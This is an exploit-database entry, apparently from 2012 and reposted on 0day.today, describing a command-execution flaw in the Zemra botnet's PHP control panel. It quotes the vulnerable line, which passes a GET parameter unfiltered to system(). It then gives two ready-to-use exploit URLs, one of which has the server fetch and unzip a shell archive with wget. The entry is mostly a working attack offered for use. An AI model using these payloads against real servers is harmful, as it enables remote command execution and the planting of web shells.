id: 19259
date: 08/24/2012
title: Zemra Botnet RFI & Command Execution
author: Angel Injection
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Zemra Botnet RFI & Command Execution
[-] Found by Angel Injection
[-] Version: N/A
[-] Security -::RISK: high
[-] platforms: php
[-] Download Link: http://tools.thehackernews.com/2012/06/zemra-botnet-download.html

Exploit:

Vuln in "Zemra/Panel/Zemra/system/command.php"
Code
if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;}

exploit
1
http://localhost/Zemra/Panel/Zemra/system/command.php?cmd=http://localhost/shell.php

2
http://localhost/Zemra/Panel/Zemra/system/command.php?cmd=wget http://localhost/shell.zip;unzip shell.zip



#  0day.today [2023-03-21]  #